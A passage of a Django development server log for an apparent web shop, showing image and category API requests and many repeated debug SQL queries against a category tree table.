/media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [30/Dec/2019 21:01:13] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [30/Dec/2019 21:01:13] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [30/Dec/2019 21:01:14] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [30/Dec/2019 21:01:14] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [30/Dec/2019 21:01:14] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [30/Dec/2019 21:01:14] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [30/Dec/2019 21:01:14] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [30/Dec/2019 21:01:14] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [30/Dec/2019 21:01:14] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [30/Dec/2019 21:01:14] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 DEBUG 2019-12-30 21:01:15,154 utils 2749 140297233225472 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-30 21:01:15,165 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-30 21:01:15,171 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-30 21:01:15,175 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-30 21:01:15,181 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-30 21:01:15,185 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-30 21:01:15,189 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-30 21:01:15,193 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-30 21:01:15,197 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-30 21:01:15,201 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-30 21:01:15,203 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-30 21:01:15,205 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-30 21:01:15,207 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-30 21:01:15,210 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-30 21:01:15,216 utils 2749 140297233225472 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-30 21:01:15,219 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-30 21:01:15,221 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-30 21:01:15,223 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-30 21:01:15,225 utils 2749 140297222735616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-30 21:01:15,229 utils 2749 140297233225472 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-30 21:01:15,232 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-30 21:01:15,235 utils 2749 140297233225472 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-30 21:01:15,238 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) [30/Dec/2019 21:01:15] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-30 21:01:15,241 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-30 21:01:15,243 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-30 21:01:15,246 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-30 21:01:15,248 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-30 21:01:15,251 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-30 21:01:15,253 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-30 21:01:15,256 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-30 21:01:15,258 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-30 21:01:15,260 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-30 21:01:15,265 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-30 21:01:15,268 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-30 21:01:15,272 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-30 21:01:15,275 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-30 21:01:15,280 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-30 21:01:15,286 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-30 21:01:15,290 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-30 21:01:15,294 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-30 21:01:15,298 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-30 21:01:15,302 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-30 21:01:15,307 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-30 21:01:15,312 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-30 21:01:15,316 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-30 21:01:15,319 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-30 21:01:15,325 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-30 21:01:15,329 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [30/Dec/2019 21:01:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [30/Dec/2019 21:01:15] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [30/Dec/2019 21:01:16] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-30 21:01:33,427 utils 2749 140297222735616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-30 21:01:33,434 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-30 21:01:33,438 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-30 21:01:33,440 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-30 21:01:33,444 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-30 21:01:33,447 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-30 21:01:33,450 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-30 21:01:33,452 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-30 21:01:33,454 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-30 21:01:33,461 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-30 21:01:33,463 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 